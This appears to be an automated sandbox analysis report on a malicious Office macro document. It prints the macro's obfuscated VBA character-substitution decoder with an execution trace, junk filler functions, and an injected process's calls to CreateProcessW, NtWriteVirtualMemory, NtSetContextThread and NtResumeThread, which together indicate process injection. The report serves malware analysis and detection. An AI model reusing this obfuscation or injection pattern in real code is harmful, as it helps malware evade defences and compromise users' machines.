?!@#$%^&()_+\|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","\xfffd") -> 93 InStr(" ?!@#$%^&()_+\|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","\xfffd") -> 95 InStr(" ?!@#$%^&()_+\|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5",":") -> 0 InStr(" ?!@#$%^&()_+\|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","/") -> 0 InStr(" ?!@#$%^&()_+\|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","w") -> 48 InStr(" ?!@#$%^&()_+\|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","\xfffd") -> 90 InStr(" ?!@#$%^&()_+\|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","\xfffd") -> 86 InStr(" ?!@#$%^&()_+\|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","m") -> 38 InStr(" ?!@#$%^&()_+\|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","\xfffd") -> 91 InStr(" ?!@#$%^&()_+\|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","\xfffd") -> 87 InStr(" ?!@#$%^&()_+\|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","\xfffd") -> 92 InStr(" ?!@#$%^&()_+\|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","d") -> 29 InStr(" ?!@#$%^&()_+\|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","\xfffd") -> 94 InStr(" ?!@#$%^&()_+\|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","\xfffd") -> 99 InStr(" ?!@#$%^&()_+\|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","\xfffd") -> 97 InStr(" ?!@#$%^&()_+\|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","z") -> 51 InStr(" ?!@#$%^&()_+\|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","g") -> 32 InStr(" ?!@#$%^&()_+\|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","\xfffd") -> 89 InStr(" ?!@#$%^&()_+\|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","b") -> 27
Mid
Mid
Mid

Strings	Decrypted Strings
" ?!@#$%^&*()_+\|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xbf\xa1\xb2\xb3\xc0\xc1\xc2\xc3\xc4\xc5\xd2\xd3\xd4\xd5\xd6\xd9\xdb\xdc\xe0\xe1\xe2\xe3\xe4\xe5\xd8\xb6\xa7\xda\xa5"
" \xbf\xa1@#$%^&*()_+\|01\xb2\xb3456789\xc0b\xc1d\xc2\xc3gh\xc4jklm\xc5\xd2\xd3q\xd4\xd5\xd6\xd9vw\xdb\xdcz.,-~A\xe0\xe1\xe2\xe3FGH\xe4JK\xe5MN\xd8\xb6QR\xa7T\xdaVWX\xa5Z?!23acefinoprstuxyBCDEILOPSUY"

Line	Instruction	Meta Information
18	Public Function pSxhdRmdThrZZNzbxJXFWIMnbXRkhEZyEAMPezBKUPtIbvOIyennmrcUcGTSjmphFUNxgiCfkxHdqePrNMoVnYd(DepjByUqPHDOgvQDNlgJLrLRZOuDECHflsWkjzDFxWleOwySvANKtGggHPdEYDctTuFzRAXHRXTgwLSUeBwZcI)
19	QoXiokwMNjluRzcsYfyGvbWWVbLELqQCSVYQpSxhdRmdThrZZNzbxJXFWIMnbXRkhEZyEAMPezBKUPtIbvOIyennmr = " ?!@#$%^&*()_+\|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xbf\xa1\xb2\xb3\xc0\xc1\xc2\xc3\xc4\xc5\xd2\xd3\xd4\xd5\xd6\xd9\xdb\xdc\xe0\xe1\xe2\xe3\xe4\xe5\xd8\xb6\xa7\xda\xa5"	executed
20	cUcGTSjmphFUNxgiCfkxHdqePrNMoVnYdDepjByUqPHDOgvQDNlgJLrLRZOuDECHflsWkjzDFxWleOwySvANKtGggHPdEYD = " \xbf\xa1@#$%^&*()_+\|01\xb2\xb3456789\xc0b\xc1d\xc2\xc3gh\xc4jklm\xc5\xd2\xd3q\xd4\xd5\xd6\xd9vw\xdb\xdcz.,-~A\xe0\xe1\xe2\xe3FGH\xe4JK\xe5MN\xd8\xb6QR\xa7T\xdaVWX\xa5Z?!23acefinoprstuxyBCDEILOPSUY"
21	For w = 1 To Len(DepjByUqPHDOgvQDNlgJLrLRZOuDECHflsWkjzDFxWleOwySvANKtGggHPdEYDctTuFzRAXHRXTgwLSUeBwZcI)	Len("\M\xfffd\xfffd\xfffd\xfffdF.\xfffd\xfffd\xfffd") -> 11 executed
22	ctTuFzRAXHRXTgwLSUeBwZcIOiqfKGGFJvBJZAzPFIAYChfMBVLCQbJJwxXhtUpTsKVKHBTQoXiokwMNjluRzcsYfyGv = InStr(QoXiokwMNjluRzcsYfyGvbWWVbLELqQCSVYQpSxhdRmdThrZZNzbxJXFWIMnbXRkhEZyEAMPezBKUPtIbvOIyennmr, Mid(DepjByUqPHDOgvQDNlgJLrLRZOuDECHflsWkjzDFxWleOwySvANKtGggHPdEYDctTuFzRAXHRXTgwLSUeBwZcI, w, 1))	InStr(" ?!@#$%^&()_+\|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","\") -> 0 Mid* executed
23	If ctTuFzRAXHRXTgwLSUeBwZcIOiqfKGGFJvBJZAzPFIAYChfMBVLCQbJJwxXhtUpTsKVKHBTQoXiokwMNjluRzcsYfyGv > 0 Then
24	bWWVbLELqQCSVYQpSxhdRmdThrZZNzbxJXFWIMnbXRkhEZyEAMPezBKUPtIbvOIyennmrcUcGTSjmphFU = Mid(cUcGTSjmphFUNxgiCfkxHdqePrNMoVnYdDepjByUqPHDOgvQDNlgJLrLRZOuDECHflsWkjzDFxWleOwySvANKtGggHPdEYD, ctTuFzRAXHRXTgwLSUeBwZcIOiqfKGGFJvBJZAzPFIAYChfMBVLCQbJJwxXhtUpTsKVKHBTQoXiokwMNjluRzcsYfyGv, 1)	Mid
25	NxgiCfkxHdqePrNMoVnYdDepjByUqPHDOgvQDNlgJLrLRZOuDECHflsWkjzDFxWleOwySvANKtGggHPdEYDctTu = NxgiCfkxHdqePrNMoVnYdDepjByUqPHDOgvQDNlgJLrLRZOuDECHflsWkjzDFxWleOwySvANKtGggHPdEYDctTu + bWWVbLELqQCSVYQpSxhdRmdThrZZNzbxJXFWIMnbXRkhEZyEAMPezBKUPtIbvOIyennmrcUcGTSjmphFU
26	Else
27	NxgiCfkxHdqePrNMoVnYdDepjByUqPHDOgvQDNlgJLrLRZOuDECHflsWkjzDFxWleOwySvANKtGggHPdEYDctTu = NxgiCfkxHdqePrNMoVnYdDepjByUqPHDOgvQDNlgJLrLRZOuDECHflsWkjzDFxWleOwySvANKtGggHPdEYDctTu + Mid(DepjByUqPHDOgvQDNlgJLrLRZOuDECHflsWkjzDFxWleOwySvANKtGggHPdEYDctTuFzRAXHRXTgwLSUeBwZcI, w, 1)	Mid
28	Endif
29	Next	Len("\M\xfffd\xfffd\xfffd\xfffdF.\xfffd\xfffd\xfffd") -> 11 executed
30	pSxhdRmdThrZZNzbxJXFWIMnbXRkhEZyEAMPezBKUPtIbvOIyennmrcUcGTSjmphFUNxgiCfkxHdqePrNMoVnYd = NxgiCfkxHdqePrNMoVnYdDepjByUqPHDOgvQDNlgJLrLRZOuDECHflsWkjzDFxWleOwySvANKtGggHPdEYDctTu
31	End Function

Non-Executed Functions

Function
YimomnhAPIs: 2, Strings: 0, Number of lines: 4, Relevance: 2.504

APIs	Meta Information
Part of subcall function nifnfzsg@ThisDocument: nil
Part of subcall function nifnfzsg@ThisDocument: nil

Line	Instruction	Meta Information
113	Function Yimomnh() as Double
114	Yimomnh = nifnfzsg
115	Call nifnfzsg()
116	End Function

Function
nifnfzsgAPIs: 1, Strings: 0, Number of lines: 4, Relevance: 1.254

APIs	Meta Information
nil

Line	Instruction	Meta Information
119	Function nifnfzsg() as Date
120	nifnfzsg = nil	nil
121	Call quibvjhv()
122	End Function

Function
YOnvdfAPIs: 0, Strings: 0, Number of lines: 4, Relevance: 0.004

Line	Instruction	Meta Information
9	Function YOnvdf() as Byte
10	YOnvdf = 0
11	Call Eeotq()
12	End Function

Function
EeotqAPIs: 0, Strings: 0, Number of lines: 4, Relevance: 0.004

Line	Instruction	Meta Information
13	Function Eeotq() as Currency
14	Eeotq = 1000000000#
15	Call ycgftitiou()
16	End Function

Function
rgdxhegAPIs: 0, Strings: 0, Number of lines: 4, Relevance: 0.004

Line	Instruction	Meta Information
78	Function rgdxheg() as Integer
79	rgdxheg = 42
80	Call uvgyjbdeh()
81	End Function

Function
uvgyjbdehAPIs: 0, Strings: 0, Number of lines: 4, Relevance: 0.004

Line	Instruction	Meta Information
82	Function uvgyjbdeh() as Long
83	uvgyjbdeh = uvgyjbdeh
84	Call Qiotbdok()
85	End Function

Function
QiotbdokAPIs: 0, Strings: 0, Number of lines: 4, Relevance: 0.004

Line	Instruction	Meta Information
87	Function Qiotbdok() as Single
88	Qiotbdok = Qiotbdok
89	Call bdekviniot()
90	End Function

Function
tiuotyAPIs: 0, Strings: 0, Number of lines: 4, Relevance: 0.004

Line	Instruction	Meta Information
98	Function tiuoty() as Boolean
99	tiuoty = False
100	Call Obvitiobb()
101	End Function

Function
tbjhjzgAPIs: 0, Strings: 0, Number of lines: 4, Relevance: 0.004

Line	Instruction	Meta Information
108	Function tbjhjzg() as Boolean
109	tbjhjzg = True
110	Call Yimomnh()
111	End Function

Function
ycgftitiouAPIs: 0, Strings: 0, Number of lines: 3, Relevance: 0.003

Line	Instruction	Meta Information
75	Function ycgftitiou() as Double
76	Call rgdxheg()
77	End Function

Function
VionotAPIs: 0, Strings: 0, Number of lines: 3, Relevance: 0.003

Line	Instruction	Meta Information
95	Function Vionot() as Currency
96	Call tiuoty()
97	End Function

Function
ObvitiobbAPIs: 0, Strings: 0, Number of lines: 3, Relevance: 0.003

Line	Instruction	Meta Information
103	Function Obvitiobb() as Single
104	Call tbjhjzg()
105	End Function

Function
MBFJbdjkbcAPIs: 0, Strings: 0, Number of lines: 3, Relevance: 0.003

Line	Instruction	Meta Information
129	Function MBFJbdjkbc() as Date
130	MBFJbdjkbc = 11 / 5 / 2024
131	End Function

Function
bdekviniotAPIs: 0, Strings: 0, Number of lines: 2, Relevance: 0.002

Line	Instruction	Meta Information
91	Function bdekviniot() as Date
93	End Function

Function
quibvjhvAPIs: 0, Strings: 0, Number of lines: 2, Relevance: 0.002

Line	Instruction	Meta Information
124	Function quibvjhv()
126	End Function

Function
RTgdJbdjkbcAPIs: 0, Strings: 0, Number of lines: 2, Relevance: 0.002

Line	Instruction	Meta Information
132	Function RTgdJbdjkbc() as Single
133	End Function

Reset < >

Analysis Process: MDEODF.exePID: 3772, Parent PID: 3556COMMON

Execution Graph

Execution Coverage:	26.2%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	75.2%
Total number of Nodes:	129
Total number of Limit Nodes:	0

Executed Functions

Function 002ED6BA Relevance: 3.2, Strings: 2, Instructions: 671
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

LRp, xrefs: 002ED828
,, xrefs: 002EE048

Memory Dump Source

Source File: 00000004.00000002.375342569.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e0000_MDEODF.jbxd

Similarity

API ID:
String ID: ,$LRp
API String ID: 0-2335222473
Opcode ID: 09e148346e21ee80d8ec894685ec117776d44f139518859cb883b80aa73c9537
Instruction ID: 0ae1801ea81379f154fe2b0d67df93ce22ab86fa9775ce5a14ce996d9177206c
Opcode Fuzzy Hash: 09e148346e21ee80d8ec894685ec117776d44f139518859cb883b80aa73c9537
Instruction Fuzzy Hash: 0E62A474A002699FDB64DF69CD85BDDBBB2AB89300F1480EAD90DA7351DB319E81CF50

Function 002EC921 Relevance: 1.9, Strings: 1, Instructions: 672
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

LRp, xrefs: 002ECA98

Memory Dump Source

Source File: 00000004.00000002.375342569.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e0000_MDEODF.jbxd

Similarity

API ID:
String ID: LRp
API String ID: 0-3405495957
Opcode ID: 176aa9c748953ed63769bd4416274cfc90d2636462e668618a54676f13584ac7
Instruction ID: 5e3925d9c18a228222b3c7ded8dc6e2fd9bbeeb0bfa7cec868fa59e6aa1f490b
Opcode Fuzzy Hash: 176aa9c748953ed63769bd4416274cfc90d2636462e668618a54676f13584ac7
Instruction Fuzzy Hash: 9262A374A012699FDB64DF69CD84BDDBBB2AB89310F1480EAD90CA7351DB319E81CF50

Function 002EB870 Relevance: 1.9, APIs: 1, Instructions: 397
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNEL32(?,00000000,?,?,?,?,?,?,?,?), ref: 002EBCBF

Memory Dump Source

Source File: 00000004.00000002.375342569.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e0000_MDEODF.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: a4b108ac5fc3e22ca518f2d52b8ee07e57cbec77adc3349750a6ab6d418d6959
Instruction ID: 0bf7c03acfa5e8fb689c33b683ddecf3658fe59a0aac1813657c34abfede619b
Opcode Fuzzy Hash: a4b108ac5fc3e22ca518f2d52b8ee07e57cbec77adc3349750a6ab6d418d6959
Instruction Fuzzy Hash: 0802EE74E102698FDF25CFA9C884B9EBBF1BF49304F5081A9E808B7251DB349A95CF54

Function 002E6F88 Relevance: 1.8, Strings: 1, Instructions: 510COMMON

Download Yara Rule

Strings

p, xrefs: 002E7038

Memory Dump Source

Source File: 00000004.00000002.375342569.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e0000_MDEODF.jbxd

Similarity

API ID:
String ID: p
API String ID: 0-2181537457
Opcode ID: dc1a746e3f7fb978291ad18bd73414fe6d1c505e093818795d68b7b2ae2fd9b6
Instruction ID: ae47b8c74357d20383e0ef538d1bd4d1596652f4a5b795387744328cba6f41b0
Opcode Fuzzy Hash: dc1a746e3f7fb978291ad18bd73414fe6d1c505e093818795d68b7b2ae2fd9b6
Instruction Fuzzy Hash: 8F32E374910299CFDB94DF69C584A8DFBB2BF89351F55C5A9D808AB212CB30DD81CFA0

Function 002E0868 Relevance: 1.8, Strings: 1, Instructions: 507COMMON

Download Yara Rule

Strings

p, xrefs: 002E08E8

Memory Dump Source

Source File: 00000004.00000002.375342569.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e0000_MDEODF.jbxd

Similarity

API ID:
String ID: p
API String ID: 0-2181537457
Opcode ID: 1628205f35728f8990162db9d6ae1586dd29bc6e5950b0d857b33f059bdd4e78
Instruction ID: e94625db922e44d69b088ce048d82d324b005b31e7a8389a0627a850dcdda944
Opcode Fuzzy Hash: 1628205f35728f8990162db9d6ae1586dd29bc6e5950b0d857b33f059bdd4e78
Instruction Fuzzy Hash: 1032C374910299CFDB54DFA9C580A8DFBB2BF88351F55C5A9C448AB212CB70ED82CF61

Function 002EC670 Relevance: 1.6, APIs: 1, Instructions: 120
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 002EC748

Memory Dump Source

Source File: 00000004.00000002.375342569.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e0000_MDEODF.jbxd

Similarity

API ID: MemoryVirtualWrite
String ID:
API String ID: 3527976591-0
Opcode ID: 0389d1fc9f73e460f5bcddacdf8573eece4075115e280d55a9c8bac100ab8fb2
Instruction ID: 4289dd0946a00425016c94611a5b9b4628b1d243886dd02e50b82cf12f65c3b6
Opcode Fuzzy Hash: 0389d1fc9f73e460f5bcddacdf8573eece4075115e280d55a9c8bac100ab8fb2
Instruction Fuzzy Hash: EE41CCB5D012589FCF00CFA9D984AEEFBF1BB49314F24942AE814B7250C3789A45CF54

Function 002EC678 Relevance: 1.6, APIs: 1, Instructions: 115
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 002EC748

Memory Dump Source

Source File: 00000004.00000002.375342569.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e0000_MDEODF.jbxd

Similarity

API ID: MemoryVirtualWrite
String ID:
API String ID: 3527976591-0
Opcode ID: afb4d16ef632afd6f90600ad2641d90a902114774bc2e49fcf3d4e3bdc39c5d0
Instruction ID: 90c9d13304f9ddd76d1053784213e225c8f9145fa119fa3c5a13bf6f7843d754
Opcode Fuzzy Hash: afb4d16ef632afd6f90600ad2641d90a902114774bc2e49fcf3d4e3bdc39c5d0
Instruction Fuzzy Hash: 4541AAB5D012589FCF00CFAAD984AEEFBF1BB49314F24942AE814B7250D374AA55CF64

Function 002EC320 Relevance: 1.6, APIs: 1, Instructions: 109
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 002EC3DA

Memory Dump Source

Source File: 00000004.00000002.375342569.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e0000_MDEODF.jbxd

Similarity

API ID: MemoryReadVirtual
String ID:
API String ID: 2834387570-0
Opcode ID: c5da7ec10c88d12bf4cb7d01741666c92446c904b7b955826d206f44e849da04
Instruction ID: 14a0f924ef93742a4161da2c4fec2b0c9e52ea4cce5e9d7451270663d59b9140
Opcode Fuzzy Hash: c5da7ec10c88d12bf4cb7d01741666c92446c904b7b955826d206f44e849da04
Instruction Fuzzy Hash: 5D41BCB5D002589FCF10CFAAD984AEEFBB1BF49310F24942AE815B7240C774A946CF54

Function 002EC328 Relevance: 1.6, APIs: 1, Instructions: 106
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 002EC3DA

Memory Dump Source

Source File: 00000004.00000002.375342569.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e0000_MDEODF.jbxd

Similarity

API ID: MemoryReadVirtual
String ID:
API String ID: 2834387570-0
Opcode ID: a4a0b9d2a7a768b8867e5eee5979fef761f5ddba1bac8f45b965323c20c0bc88
Instruction ID: aa61f3c091869b133eb3d1431d431b3b251f9fed7a22b067b2e8a148edff6296
Opcode Fuzzy Hash: a4a0b9d2a7a768b8867e5eee5979fef761f5ddba1bac8f45b965323c20c0bc88
Instruction Fuzzy Hash: A441A9B5D002589FCF10CFAAD984AEEFBB1BB49310F20942AE814B7200C774A945CF64

Function 002EC7C8 Relevance: 1.6, APIs: 1, Instructions: 96
nativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtSetContextThread.NTDLL(?,?), ref: 002EC87F

Memory Dump Source

Source File: 00000004.00000002.375342569.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e0000_MDEODF.jbxd

Similarity

API ID: ContextThread
String ID:
API String ID: 1591575202-0
Opcode ID: 44e0e11ae897324424cd1470b123ed684eb8bd55e684582b9ef45a81c5eaf1d9
Instruction ID: 76763bf922612ce1e1c8eb2107a1348374734deb390d9d5187c2638e22f224e4
Opcode Fuzzy Hash: 44e0e11ae897324424cd1470b123ed684eb8bd55e684582b9ef45a81c5eaf1d9
Instruction Fuzzy Hash: 3941AAB5D102589FCB14CFAAD984AEEBFF1AB49314F24842AE414B7240C7789949CF54

Function 002EC7D0 Relevance: 1.6, APIs: 1, Instructions: 94nativethreadCOMMON

Download Yara Rule

APIs

NtSetContextThread.NTDLL(?,?), ref: 002EC87F

Memory Dump Source

Source File: 00000004.00000002.375342569.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e0000_MDEODF.jbxd

Similarity

API ID: ContextThread
String ID:
API String ID: 1591575202-0
Opcode ID: 3dbdcbfd236b6bfea15401fbe5d19d6b2bc1a16350fd35cb03a71a1b8af8113a
Instruction ID: c25974d06ab68c9b1d0622e1a198442fb17fe880f72a54cdc5d93de9b147568d
Opcode Fuzzy Hash: 3dbdcbfd236b6bfea15401fbe5d19d6b2bc1a16350fd35cb03a71a1b8af8113a
Instruction Fuzzy Hash: 2731BBB5D102589FCB10CFAAD984AEEFBF1BF49314F24842AE414B7240C778A949CF54

Function 002EC451 Relevance: 1.6, APIs: 1, Instructions: 82nativethreadCOMMON

Download Yara Rule

APIs

NtResumeThread.NTDLL(?,?), ref: 002EC4E1

Memory Dump Source

Source File: 00000004.00000002.375342569.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e0000_MDEODF.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 79f6cc0df1f8c82de32ec176dcf0c1bb9f764250cdfe3a791794554ba8fd23f0
Instruction ID: 252e8a53827ebb3a449a8ffd26784c0b31e544e8c8093c0475a3116c1d3781af
Opcode Fuzzy Hash: 79f6cc0df1f8c82de32ec176dcf0c1bb9f764250cdfe3a791794554ba8fd23f0
Instruction Fuzzy Hash: BF31AAB5D012589FCF10CFA9E984AEEFBF1AB49314F24942AE805B7340C774A946CF54

Function 002EC458 Relevance: 1.6, APIs: 1, Instructions: 80nativethreadCOMMON

Download Yara Rule

APIs

NtResumeThread.NTDLL(?,?), ref: 002EC4E1

Memory Dump Source

Source File: 00000004.00000002.375342569.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e0000_MDEODF.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 023f69b262956f654107e5d3dac05b3f984bfe8c44d1240708cb78723d21fbc1
Instruction ID: b0a115655d6f9803a7844634e08e2dcbf27f396842618cad2d46bb53b24bfa70
Opcode Fuzzy Hash: 023f69b262956f654107e5d3dac05b3f984bfe8c44d1240708cb78723d21fbc1
Instruction Fuzzy Hash: D331B9B5D012589FCF10CFAAE984AAEFBF5BB49310F20942AE805B7300C774A945CF94

Function 002E38F8 Relevance: .6, Instructions: 558COMMON

Download Yara Rule

Memory Dump Source

